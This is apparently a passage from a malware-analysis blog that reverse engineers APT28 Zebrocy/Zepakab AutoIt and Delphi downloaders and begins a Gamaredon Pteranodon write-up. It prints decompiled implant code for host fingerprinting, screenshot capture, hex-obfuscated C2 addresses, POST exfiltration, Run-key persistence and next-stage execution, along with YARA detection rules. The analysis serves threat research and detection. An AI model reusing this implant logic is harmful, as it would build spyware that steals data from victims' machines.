 $asoft = "                --------Software-------" & @CRLF & @CRLF & @CRLF
 While 1
  $appkey = RegEnumKey($reggetkey, $i)
  If @error  0 Then ExitLoop
  $asoftstingtemp = StringStripWS(RegRead
($reggetkey & "\" & $appkey, "DisplayName"), 3)
  $asoft = $asoft & $asoftstingtemp & @CRLF
  $i += 1
 WEnd
 $sys_info = "                --------System info-------" & @CRLF
 $sys_info = $sys_info & "TempDir: " & @TempDir & @CRLF
 $_getddive = DriveGetDrive("ALL")
 $sys_info = $sys_info & "Program start: " & @ScriptDir & "\" & @ScriptName & @CRLF & @CRLF & @CRLF
 For $dd = 1 To $_getddive[0]
  $sys_info = $sys_info & "Name : " & $_getddive[$dd] & " La" & "bel: "
  $sys_info = $sys_info & DriveGetLabel($_getddive[$dd] & "\") 
        & " FR" & "EE : " & DriveSpaceFree($_getddive[$dd] & "\") & @CRLF
 Next
 $sys_info_w_system_info = ""
 $sys_info_w_system_info = "                --------Windows system info-------" & @CRLF
 $w_system_info = _getdosoutput("systeminfo")
 $sys_info_w_system_info = $sys_info_w_system_info & $w_system_info & @CRLF & @CRLF & @CRLF
 $sys_info_sprocesslist = ""
 $sys_info_sprocesslist = "                --------Processes-------" & @CRLF
 $aprocesslist = ProcessList()
 $sprocesslist = _arraytostring($aprocesslist, " ")
 $sys_info_sprocesslist = $sys_info_sprocesslist & $sprocesslist & @CRLF & @CRLF & @CRLF
 Return $sys_info_sprocesslist & $asoft & $sys_info & $sys_info_w_system_info
EndFunc

C. Zebrocy/Zepakab Downloader Implant (32-Bit for 64-bit Autoit Compiled) (Thu Feb 15 04:16:27 2018)

The sample timestamp shows compilation timestamp of¬†Thursday, February 15 04:16:27 2018 UTC¬†with the same version language code set to English, Great Britain.¬†The malware version describes itself as “Certificate verify checker.”¬†The Zebrocy/Zepakab leverages AutoIT GUI API (with hidden Tray Icon) but adds hex encoding to obfuscate its values. It is interesting that this malware has the similar naming convention to the Golang version with the identical name of “getsnd” for the malware bot ID.
The malware also fakes itself as Microsoft PowerPoint and has the logic to take a desktop screenshot.
The malware adds persistence to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” as “MSCertificate” and installs itself as “%APPDATA%\Microsoft\Settings\Safety Warning Level\iecslss.exe”.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;; Zepakab/Zebrocy 3 AutoIT Main Excerpt ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
main()
("JKSHDKG")
(48, "Microsoft PowerPoint", "PowerPoint can't read the outline from " & 
(@ScriptFullPath, ".exe", ".pptx") & " . No text converter is installed for this file type.")
("iecslss.exe")  0535
$getsnd = getsnd()
$systeminformation = getsysinfo()
; hxxp://220[.]158[.]216[.]127/search-sys-update-release/base-sync/db7749sc.php
$surl = _hextostring
("687474703A2F2F3232302E3135382E3231362E3132372F7365617263682D7379732D7570646174652D72656C656173652F626173652D73796E632F64623737343973632E706870")
$screen = _get_screen()
$data = _sendpost($surl, $systeminformation, $screen, $getsnd)
_savetofile($data)
main()

1. “_getscreen()” Function
The malware saves the desktop screenshot to “%TEMP%\GDIPlus_Image1.jpg” via the following function:

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;; Zepakab "_getscreen" ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func _get_screen()
; "\GDIPlus_Image1.jpg"
_screencapture_capture(@TempDir & _hextostring("5C474449506C75735F496D616765312E6A7067"))
$text = (@TempDir & _hextostring("5C474449506C75735F496D616765312E6A7067"))
(@TempDir & _hextostring("5C474449506C75735F496D616765312E6A7067"))
_stringtohex($text)
EndFunc

2. “_sendpost()” Function
Finally, the malware sends the collected information to the server via decoding hex-encoding URI parameters and WinHTTP header values.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;; Zebrocy/Zepakab "_sendpost" Function ;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
_sendpost($surl, $sysinfo, $screen, $getsnd)
$i = 0
; dbgate= &sysinfo & &win32= & $screen
$spd = _hextostring("6462676174653D") 
& $sysinfo & _hextostring("2677696E33323D") & $screen
$ohttp = ("winhttp.winhttprequest.5.1")
; POST $surl & ?next= & $getsnd
$ohttp.open(_hextostring("504F5354"), $surl & _hextostring("3F6E6578743D") 
& $getsnd, 40)
; Content-Type application/x-www-form-urlencoded
$ohttp.setrequestheader(_hextostring("436F6E74656E742D54797065"), 
_hextostring("6170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564"))
$ohttp.send($spd)
$oreceived = $ohttp.responsetext
$ostatuscode = $ohttp.status
$ostatuscode = 2005
($oreceived)
$i = $i + 1
$i = 10518

D. Zebrocy/Zepakab Downloader Implant (32-Bit for 64-bit Autoit Compiled) (Wed Sep 05 01:23:45 2018)
The sample timestamp shows compilation timestamp of¬†Wednesday, September 05 01:23:45 2018¬†UTC¬†with the version language codepage set to English, Great Britain.¬†The malware version describes itself as “Program Compatibility Assistant” impersonating Microsoft, Inc. The Zebrocy/Zepakab leverages AutoIT GUI API continues to leverages hex-encoding to obfuscate its values.
The main “checkupdate()” function is used to communicate with the server on HTTPS.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;; Zepakab "checkupdate" ;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
checkupdate()
; rcd=
$postdata = _hextostring("7263643D") & _postdate()
; https://145.249.106.198/
$host = _hextostring("68747470733A2F2F3134352E3234392E3130362E3139382F0D0A")
; client/en/community/supportcli.php
$uri = _hextostring("636C69656E742F656E2F636F6D6D756E6974792F737570706F7274636C692E706870")
; Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
$hopen = _winhttpopen(_hextostring("4D6F7A696C6C612F352E30202857696E646F7773204E5420362E313B20574F5736343B2072763A32352E3029204765636B6F2F32303130303130312046697265666F782F32352E30"))
$hconnect = _winhttpconnect($hopen, $host)
; POST
$sreturned = _winhttpsimplesslrequest($hconnect, _hextostring("504F5354"), $uri, 41, $postdata, 41, 41, 41, 41, 41, 1)
_winhttpclosehandle($hconnect)
_winhttpclosehandle($hopen)
parsefile($sreturned)
(20000)
checkupdate()

1. “parsestring()” and “parsefile()” Functions
The Zebrocy/Zepakab malware leverages parse for information and delay walking through directories hex-decoding to $path.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;; Zepakab main excerpt  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
parsestring($path)
$delay = 20000
;%[1-5]%
$path = ($path, _hextostring("253125"), @AppDataCommonDir)
$path = ($path, _hextostring("253225"), @AppDataDir)
$path = ($path, _hextostring("253325"), @LOCALAPPDATADIR)
$path = ($path, _hextostring("253425"), @StartupDir)
$path = ($path, _hextostring("253525"), @SystemDir)
$path
parsefile($data)
$delay = (3, 7) * 62000
$ares = ($data, @CRLF)
@error = 15
($delay)

E. Zebrocy/Zepakab Downloader Implant (32-Bit for 32-bit AutoIt Compiled) (Wed Jan 16 12:10:59 2019)

The recent Zebrocy/Zepakab AutoIt downloader implant was UPX-packed and packed on Wed Jan 16 12:10:59 2019 UTC with the unpacked sample compilation timestamp of Wed Jan 16 06:10:59 2019 UTC) with the language set to English, Great Britain [LANG_ENGLISH,SUBLANG_ENGLISH_UK].
[IMAGE_FILE_HEADER]
0x114      0x0   Machine:                   0x14C     
0x116      0x2   NumberOfSections:          0x3       
0x118      0x4   TimeDateStamp:             0x5C3F1F53 [Wed Jan 16 12:10:59 2019 UTC]
0x11C      0x8   PointerToSymbolTable:      0x0       
0x120      0xC   NumberOfSymbols:           0x0       
0x124      0x10  SizeOfOptionalHeader:      0xE0      
0x126      0x12  Characteristics:           0x122     
Flags: IMAGE_FILE_32BIT_MACHINE, IMAGE_FILE_EXECUTABLE_IMAGE, IMAGE_FILE_LARGE_ADDRESS_AWARE

 

The payload has¬†ProductName “Microsoft Windows Operating System” with the¬†FileDescription “ServicesTray.”
The malware flow excerpt is as follows setting the downloader as “srhost.exe”.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;; Zebrocy/Zepakab main flow excerpt ;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Opt("trayiconhide", 1)
$uri = "locale/protocol/volume.php"
$host = "hxxps://185[.]236[.]203[.]53/"
$call = True
$fp = "c:\ProgramData\Windows\Microsoft\Settings\srhost.exe"
$copybaras = ""
$argv = argv()
main()

The malware contained the following main functions:

Command Name Description
main() Convert host data to Base64 with padded “F” on the reverse length of Base64 data blob and appended to “img=” (until 5)
info() -> _computergetoss() Parse WMI “SELECT * FROM Win32_OperatingSystem”
scr() Obtains desktop screenshot
parseresponse() Installs to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run as “Security_Maintenance”
crocodile() Run the next stage via ShellExecute API
The “main” function essentially Base64’s collected host info and desktop screenshot blob with padding it with the algorithm concatenating “F” to reverse string length of the host collected data Base64¬†blob until 5 and adding it along with the Base64 host and desktop screenshot and appending to “img=”¬†with the HTTPS server communication. This small addition prevents simple Base64 conversion of the data, which is done automatically by many network traffic analyzers with the goal to avoid basic plaintext traffic detection.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;; Zebrocy/Zepakab "main" function ;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func main()
 While $call
  $fo = FileOpen($fp, 2 + 8 + 16)
  $si = StringReplace(base64(info()), "\r\n", "")
  $sc = StringReplace(base64(scr()), "\r\n", "")
  If $si = "" Then Exit
  If $sc = "" Then Exit
  $coun = STRINGREVERSE(StringLen($si))
  For $k = StringLen($coun) To 5
   $coun = $coun & "F"
  Next
  $coun = "img=" & $coun & $si & $sc
  connect($coun, $fo)
  $ap = $fo
  crocodile($ap)
  If $call Then
   Sleep(60000)
  Else
   ExitLoop
  EndIf
 WEnd
EndFunc
The malware fingerprints host¬†by parsing results of Windows Management Instrumentation (WMI) query of “SELECT * FROM Win32_OperatingSystem”.

Yara Signature

import "pe"
import "hash"
rule apt28_zebrocy_autoit_loader {
meta:
   reference = "Detects Possible Autoit APT28 Zebrocy downloader"
   author = “@VK_Intel / @sysopfb"
   date = "2019-01-21; Edited: 2019-01-22"
   type = "experimental"
strings:
// "AU3!EA068" header
$au3 = { 41 55 33 21 45 41 30 36 4D }
$autscr = "/AutoIt3ExecuteLine" fullword wide
$arch = " $MS = "MS " ascii wide
$Microsoft = "Microsoft Inc." ascii wide
$s0 = "PROCESSGETSTATS" fullword wide
$s1 = "SHELLEXECUTEWAIT" fullword wide
$s2 = "WINGETPROCESS" fullword wide
$s3 = "0Expected a \"=\" operator in assignment statement.*Invalid keyword at the start of this line." fullword wide
$s4 = "SHELLEXECUTE" fullword wide
$s5 = "SCRIPTNAME" fullword wide /* base64 encoded string 'H$H=3@0' */
$s6 = "PROCESSSETPRIORITY" fullword wide
$s7 = "HTTPSETUSERAGENT" fullword wide
$s8 = "PROCESSWAITCLOSE" fullword wide
$s9 = "PROCESSCLOSE" fullword wide
$s10 = "PROCESSWAIT" fullword wide
$s11 = "PROCESSEXISTS" fullword wide
$s12 = "PROCESSORARCH" fullword wide
$s13 = "AUTOITWINGETTITLE" fullword wide
condition:
uint16(0) == 0x5a4d and ($MS or $Microsoft) and $au3 and $autscr and $arch and filesize < 1500KB and all of ($s*) and pe.number_of_resources > 7 and
(for any i in (0..pe.number_of_resources - 1):
(pe.resources[i].type == pe.RESOURCE_TYPE_RCDATA and hash.md5(pe.resources[i].offset, 96) == "84a7952bb4bdb93c11e32fe2de63b00c"))
}

Let’s Learn: (Over)Analyzing One of the Latest APT28 Zepakab/Zebrocy Delphi Implant

Goal: Analyze one of the latest APT28 Zepakab/Zebrocy Delphi implant exploring its functionality (pseudo-source code level).

https://platform.twitter.com/widgets.js
Source:
APT28 Zepakab/Zebrocy implant (MD5: 3e713a838a68259ae2f9ef2eed05a761
Outline:

I. Background & Executive Summary
II. APT28 Zepakab/Zebrocy Malware Function Analysis
A. 'MainProcessor' Function
1. 'GetDesktopScreenshot' 
2. 'GetHostinformation'
3. 'PostDataParameters'
4. 'CheckInstall'
5. Execute Next Stage & Exit
B. 'GetHostinformation' Function
C. 'PostDataParameters' Function
D. 'MachineID' Function
E. 'LocalInstall' Function
F. 'RegistryInstall' Function
III. Yara Signature

I. Background & Executive Summary
This is a continuation of the APT28 Zepakab/Zebrocy implant malware analysis from previous analysis of these types of malware (1) (2) (3)(4). APT28 is also known as Sofacy, Fancy Bear, STRONTIUM, Pawn Storm, and Sednit.
One of the notable peculiarities¬†is the malware hex-encoding with padded “@” (e.g., user-agent parser string), which meant to slightly complicate direct hex decoding of malware values.

The analysis explores pseudo-coded C++ code with Delphi Borland constructs. It is interesting the group continues to leverage Qhoster¬†¬†AS49544 I3DNET, NL for its server (“../action-center/..” path) as the same exact server was noted communicated to the totally different URI (“../company-device-support/../” path) on the same exact server as reported by ESET earlier.
II. APT28 Zepakab/Zebrocy Malware Function Analysis
A. ‘MainProcessor’ Function
The APT28 main function calls the main functions of the malware as follows:
1. ‘GetDesktopScreenshot’¬†
The sequence of Windows API and Delphi constructs to obtain the Desktop screenshot as (‘.jpg’) is as follows:

GetDesktopWindow -> GetDC -> Forms::TScreen::GetDesktopWidth ->
Forms::TScreen::GetDesktopHeight -> Graphics::TBitmap::TBitmap -> 
Jpeg::TJPEGImage::TJPEGImage -> Graphics::TBitmap::GetCanvas ->
Graphics::TCanvas::GetHandle -> BitBlt -> GetDesktopWindow > ReleaseDC

2. ‘GetHostinformation’
The malware obtains the host information enumerating ‘systeminfo’ and ‘taskskist’ combined with the current date and¬†enumerated¬†drives.
3. ‘PostDataParameters’
It leverages this function to call the server for the next stage.
4. ‘CheckInstall’
The sequence of Windows API calls to check if the payload exists locally is as follows:

v2 = FindFirstFileA(v1, &FindFileData) ->
if ((if v2 = (HANDLE)0xFFFFFFFF || (FindClose(FindFileData.dwFileAttributes &
FILE_ATTRIBUTE_DIRECTORY) == FILE_ATTRIBUTE_DIRECTORY) and 0
//////////////////////////////
/////// Other than that //////
//////////////////////////////
FindFileData.nFileSizeHigh, FindFileData.nFileSizeLow);

5. Execute Next Stage & Exit
The malware executes the next stage via ShellExecuteA API and exiting via Forms::TApplication::Terminate.
The relevant main pseudo-coded function is as follows:

////////////////////////////////////////////////
////// APT28 Zepakab MainProcessor Excerpt /////
////////////////////////////////////////////////
// 'hxxp://45[.]124[.]132[.]127/action-center/centerforserviceandaction/
// service-and-action[.]php'
System::__linkproc__ LStrLAsg(&v25, &str_687474703A2F2F3[1]);
GetDesktopScreenshot((int)&v18);
GetHostinformation((int)&v17, a3, a4, a5);
PostDataParameters(v25, (int)&v26, a2, a3, a4);
Sleep_0(4009u);
FindFirstFileA_Attrib
ShellExecuteA
do
{
GetDesktopScreenshot((int)&v18); // Make a desktop screenshot
System::__linkproc__ LStrAsg(v24 + 896, v18);
GetHostinformation((int)&v17, a3, a4, a5); // Collect host information
System::__linkproc__ LStrAsg(v24 + 892, v17);
PostDataParameters(v25, (int)&v26, a2, a3, a4); // Post host infromation to server
trim_process(v26, (int)&v16, a2, a3, a4);
System::__linkproc__ LStrLAsg(&v26, v16);
Sleep_0(4009u); // Sleep for 4009 miliseconds
hex_decode(v26, (int)&v15, a2, a3, a4);
LStrToPChar(v24, v15, *(_DWORD *)(v24 + 888));
if ( ++*(_DWORD *)(v24 + 0x388) >= 5 )
System::__linkproc__ Halt0();
// Check if installed via FindFirstFileA (FindFileData) attribute
a2 = CheckInstall(*(_DWORD *)(v24 + 888));
if ( a2 <= 0 )
// if not, sleep for 18000 miliseconds
Sleep_0(18000u);
}
while ( a2 <= 0 );
Sleep_0(3000u);
v11 = &savedregs;
v10 = &loc_4E6E36;
v9 = __readfsdword(0);
__writefsdword(0, (unsigned int)&v9);
v7 = (const CHAR *)System::__linkproc__ LStrToPChar(*(_DWORD *)(v24 + 888));
// Run payload via ShellExecuteA
ShellExecuteA(0, 0, v7, 0, 0, 0);
__writefsdword(0, v9);
// Terminate application
Forms::TApplication::Terminate(*(Forms::TApplication **)off_4EF164[0]);
__writefsdword(0, v12);
v14 = (int *)&loc_4E6E7B;
System::__linkproc__ LStrArrayClr(&v15, 9);
return System::__linkproc__ LStrArrayClr(&v25, 2);
}

B. ‘GetHostinformation’¬†Function
The malware obtains the host information via running¬†‘SYSTEMINFO & TASKLIST’ commands (initially, hex-encoded padded with “@”) via cmd.exe \c pipe function concatenated with¬†the current timestamp as leveraging¬†Sysutils::Now¬†and¬†Sysutils::DateTimeToString.
Then, it obtains the drive information via GetLogicalDriveStringsA and GetDriveTypeA and querying for DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE and concatenating the output.
For example:
UINT drive = GetDriveTypeA(v5);
if ( drive >= 2 && drive <= 4 ) // DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE
The relevent pseudo-coded function is as follows:

////////////////////////////////////////////////
////// Zepakab GetHostinformation Excerpt /////
////////////////////////////////////////////////
int __usercall GetHostinformation(int a1, int a2, int a3, long double a4)
{
...
v4 = a1;
v15 = &savedregs;
v14 = &loc_4E6499;
v13 = __readfsdword(0);
__writefsdword(0, (unsigned int)&v13);
System::__linkproc__ LStrLAsg(&v24, &str_[1]);// 'SYSTEMINFO & TASKLIST'
while ( System::Pos(&str___2[1], v24) > 0 ) // '@'
{
v5 = System::Pos(&str___2[1], v24);
System::__linkproc__ LStrDelete(&v24, v5, 1);
}
System::__linkproc__ LStrLAsg(&v23, &str____18[1]);//'\r\n'
System::__linkproc__ LStrClr();
Sysutils::Now();
__asm { fstp [ebp+var_18] }
Sysutils::DateTimeToString(LODWORD(v21), HIDWORD(v21));// Create Date Timestamp Now()
System::__linkproc__ LStrCat3(&v25, v22, v23);
v6 = v25;
GetDriveData((int)&v20, a2); // GetDrive Information 
// (removable fixed remote, size total: , size free: )
System::__linkproc__ LStrCatN(&v25, 4, v7, v13, v6, v20, v23, v23);
v8 = v25;
v9 = *off_4EF164[0];
unknown_libname_1118();
System::__linkproc__ LStrCatN(&v25, 3, v10, v14, v13, v8, v19, v23);
hex_decode(v24, (int)&System::AnsiString, v4, a2, a3);
Sysutils::Trim(System::AnsiString);
PipeCmdReadFile(v17, (int)&v18, v4, a2); // CMD Command Runner: 
 // 'cmd.exe /c pipe CreateProcessA'
  System::__linkproc__ LStrCat(&v25, v18);
  while ( System::Pos(&str___5[1], v25) > 0 )   // '&'
  {
    v11 = System::Pos(&str___5[1], v25);
    *(_BYTE *)(j_unknown_libname_87_0(&v25) + v11 - 1) = 44;
  }
  System::__linkproc__ LStrAsg(v4, v25);
  __writefsdword(0, v13);
  v15 = (int *)&loc_4E64A0;
  System::__linkproc__ LStrArrayClr(&System::AnsiString, 5);
  return System::__linkproc__ LStrArrayClr(&v22, 4);
}

C. ‘PostDataParameters’¬†Function
The malware contactenates and adds the following decoded URI parameters as follows¬†(with the hardcoded padded with ‘@’ user-agent as “Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1”):

info_w
syss
action

It leverages the following Delphi constructs:

TIdCustomHTTP
cls_IdHTTP_TIdHTTP
Idhttp::TIdCustomHTTP::GetRequestHeaders()
Idhttp::TIdCustomHTTP::SetAllowCookies((int)v24, v8)
TIdCustomHTTP with Classes::TStrings

The relevant pseudo-coded function is as follows:

////////////////////////////////////////////////
////// Zepakab PostDataParameters Function /////
////////////////////////////////////////////////
int __usercall PostDataParameters(int a1, int a2, int a3, int a4, int a5)
{
...
v18 = 0;
v19 = 0;
v20 = 0;
v21 = a2;
v23 = a1;
System::__linkproc__ LStrAddRef(v15, v16, v17);
v14 = &savedregs;
v13 = &loc_4E69A5;
v12 = (int *)__readfsdword(0);
__writefsdword(0, (unsigned int)&v12);
LOBYTE(v5) = 1;
v22 = (System::TObject *)unknown_libname_57(cls_Classes_TStringList, v5);
hex_decode((int)&str_737973733D[1], (int)&v19, a3, a4, a5);// 'syss='
System::__linkproc__ LStrCat(&v19, *(_DWORD *)(dword_4F4630 + 892));
(*(void (__fastcall **)(System::TObject *, int, _DWORD))(*(_DWORD *)v22 + 56))(v22, v19, *(_DWORD *)v22);
hex_decode((int)&str_616374696F6E3D[1], (int)&v18, a3, a4, a5);// 'action='
System::__linkproc__ LStrCat(&v18, *(_DWORD *)(dword_4F4630 + 896));
(*(void (__fastcall **)(System::TObject *, int))(*(_DWORD *)v22 + 56))(v22, v18);
v24 = ClassCreate((Idbasecomponent::TIdInitializerComponent *)&cls_IdHTTP_TIdHTTP, 1);
v12 = &savedregs;
v11 = &loc_4E6968;
v10 = __readfsdword(0);
__writefsdword(0, (unsigned int)&v10);
System::__linkproc__ LStrLAsg(&v20, &str__M__o_z_il_la__[1]);
// 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1'
while ( System::Pos(&str___3[1], v20) > 0 ) // '@'
{
v6 = System::Pos(&str___3[1], v20);
System::__linkproc__ LStrDelete(&v20, v6, 1);
}
v7 = Idhttp::TIdCustomHTTP::GetRequestHeaders(v24);
System::__linkproc__ LStrAsg(v7 + 136, v20);
LOBYTE(v8) = 1;
Idhttp::TIdCustomHTTP::SetAllowCookies((int)v24, v8);
*((_BYTE *)v24 + 288) = 1;
TIdCustomHTTP_0(a3, a4, a5, (int)&savedregs); // '?info_w='
__writefsdword(0, v10);
System::TObject::Free(v24);
System::TObject::Free(v22);
__writefsdword(0, (unsigned int)v13);
v15 = &loc_4E69AC;
System::__linkproc__ LStrArrayClr(&v18, 3);
return System::__linkproc__ LStrClr();
}

D. ‘MachineID’ Function
The malware ID is generated GetVolumeInformationA(c:\\) of VolumeNumber concatenated with “-” and computer name via GetComputerNameA API return.
The relevant pseudo-coded function is as follows:

////////////////////////////////////////////////
//////// APT28 Delphi MachineID Function ///////
////////////////////////////////////////////////
int __usercall MachineID(int a1, int a2)
{
...
  MaximumComponentLength = 0;
  v11 = 0;
  v10 = 0;
  v9 = 0;
  v8 = a2;
  v2 = a1;
  v7 = &savedregs;
  v6 = &loc_4E5C66;
  v5 = (CHAR *)__readfsdword(0);
  __writefsdword(0, (unsigned int)&v5);
  LStrClr((int)&str_0_23[1], 16, a1);
  if ( GetVolumeInformationA("c:\\", 0, 0, &VolumeSerialNumber, &MaximumComponentLength, \
&MaximumComponentLength, 0, 0) )
  {
    GetComputerNameA_0(v5, v6);
    IntToHexStrCat(v11, (int)&v14);
    v3 = v14;
    if ( v14 )
      v3 = *(_DWORD *)(v14 - 4);
    if ( v3 < 8 )
    {
      LStrClr((int)&str___87[1], 17, (int)&v10);// '-'
      System::__linkproc__ LStrCat(&v14, v10);
    }
    System::__linkproc__ LStrCopy(&v14);
    Sysutils::IntToHex(VolumeSerialNumber, 8);
    System::__linkproc__ LStrCat3(v2, v9, v14);
  }
  __writefsdword(0, (unsigned int)v7);
  v9 = &loc_4E5C6D;
  System::__linkproc__ LStrArrayClr(&v9, 3);
  return System::__linkproc__ LStrClr();
}

E. ‘LocalInstall’ Function
The ‘LocalInstall’ functions leverages¬†hex decoding function coupled with¬†GetEnvironmentVariable(%APPDATA%) concactenating with the¬†LStrCat3 the decoded “\Notification\” to create local install path as “%APPDATA%\Notification\”.
The relevant pseudo-coded function is as follows:

////////////////////////////////////////////////
//////// LocalInstall Function ////////////
////////////////////////////////////////////////
int __usercall LocalInstall(int a1, int a2, int a3)
{
v10 = 0;
v9 = 0;
v3 = a1;
v8 = &savedregs;
v7 = &loc_4E6BC8;
v6 = __readfsdword(0);
__writefsdword(0, (unsigned int)&v6);
hex_decode((int)&str_5C4E6F746966696[1], (int)&v10, a1, a2, a3);// '\\Notification\\'
v4 = v10;
Sysutils::GetEnvironmentVariable((const int)&str_APPDATA[1]);// '%APPDATA%'
System::__linkproc__ LStrCat3(v3, v9, v4);
__writefsdword(0, v6);
v8 = (int *)&loc_4E6BCF;
return System::__linkproc__ LStrArrayClr(&v9, 2);
}
if ( !v26 )
{
v5 = *off_4EF164[0];
unknown_libname_1118();
Sysutils::ExtractFilePath(System::AnsiString);
}
hex_decode((int)&str_6D6472762E65786[1], (int)&v21, a2, a3, a4);// 'mdrv.exe'
System::__linkproc__ LStrCat3(v24 + 888, v26, v21);

...
}

F. ‘RegistryInstall’¬†Function
The ‘RegistryInstall’ function sets up the malware persistence in

'Software\Microsoft\Windows\CurrentVersion\Run' disguised as 'UpdDriver'

The relevant pseudo-coded function is as follows:

////////////////////////////////////////////////
//////// RegistryInstall Function ////////////
////////////////////////////////////////////////
int __usercall RegistryInstall(int a1, int a2, int a3)
{
...

v7 = 0;
v6 = &savedregs;
v5 = &loc_4E6FAE;
v4 = __readfsdword(0);
__writefsdword(0, (unsigned int)&v4);
hex_decode((int)&str_557064447269766[1], (int)&v7, a1, a2, a3);// 'UpdDriver'
// 'Software\Microsoft\Windows\CurrentVersion\Run'
WriteKey(&str_Software_Micros[1], v7, *(_DWORD *)(dword_4F4630 + 888));
__writefsdword(0, v4);
v6 = (int *)&loc_4E6FB5;
return System::__linkproc__ LStrClr();
}

III. Yara Signature

rule apt28_zepakab_delphi_implant {
   meta:
      reference = "Detects APT28 Zepakab/Zebrocy Delphi Implant"
      author = "@VK_Intel"
      date = "2019-01-09"
      hash1 = "cd925e2464d251f02b4d425e301acf276e13eeccbbf5996ade5a6f355802abb7"
      type = "experimental"
strings:
      $b0 = "http://www.borland.com/namespaces/Types" fullword ascii wide
      $b1 = "SOFTWARE\\Borland\\Delphi\\RTL" fullword ascii wide
      $ap0 = "ShellExecuteA" fullword ascii wide
      $ap1 = "GetDriveTypeA" fullword ascii wide
      $ap2 = "FindFirstFileA" fullword ascii wide
      $ap3 = "GetDesktopWindow" fullword ascii wide
      $ap4 = "GetEnvironmentVariableA" fullword ascii wide
      $ap5 = "BitBlt" fullword ascii wide
      $ap6 = "GetDriveTypeA" fullword ascii wide
      $sleep = "Sleep" fullword ascii wide
      $sysutils = { 79 73 55 74 69 6c 73 }
condition:
    ( uint16(0) == 0x5a4d and filesize > 1000KB and all of ($b*) and all of ($ap*) and #sleep > 1 and $sysutils)
}

 

Let’s Learn: Deeper Dive into Gamaredon Group Pteranodon Implant Version ‘_512’

Goal: Reverse engineer and review the Gamaredon Group Pteranodon Implant (including its batch scripts and decoding mechanism).

https://platform.twitter.com/widgets.js Source:
Original .SFX binary (MD5: f8e884b75216c3e054e9869f933194e5)
‘23910.cmd’ (MD5: 34ff17db1d4efff89cfee8d03d48e5d7)
‘22944.cmd’¬†(MD5: 197a825d4bfeb093a3c4b969fd4c7338)
‘15485.cmd’¬†(MD5: 265c3c01f267b699ef0e5c0b8e4a5715
2750.exe’¬†(MD5: 9136ffa83ef2415a76d437a303e9b38e)
dec_15875.exe”¬†(MD5: 2651ee62f76756a8941ef6632577e427)
Outline:

I. Background & Summary
II. Malware Installation: Batch '.cmd' Scripts
A. '23910.cmd' (previously known as "Wariables.cmd" and "War.cmd" combined)
B. '22944.cmd' (previously known as "id.cmd")
C. '15485.cmd' (previously known as "usb.cmd")
III. Decoding Xor Utility '2750.exe' (previously known as "Crypt.exe")
IV. "dec_15875.exe" wget Binary
IV. Yara Signature

I. Background & Summary
While looking into one of the latest Pterodo/Pteranodon toolkit samples attributed to Gamaredon Group caught by @DrunkBinary, I decided to take a deeper dive into the malware chain and associated tools and scripts. Notably, packaged as self-extracting zip-archive (.SFX), the malware implant contains batch scripts, XOR decoder tool, and obfuscated code. It appears that this very malware contains hardcoded malware version of ‚Äú_520‚ÄĚ.
It is notable that this Gamaredon group was reportedly targeting Ukrainian military and law enforcement as it was reported by CERT-UA. In of the alerts, CERT-UA alerted of the Pterodo infections as follows targeting Ukrainian government:

CERT-UA together with the Foreign Intelligence Service of Ukraine found new modifications of Pterodo-type malware on computers of state authorities of Ukraine, which is likely to be the preparatory stage for a cyber attack. This virus collects system data, regularly sends it to command-control servers and expects further commands.

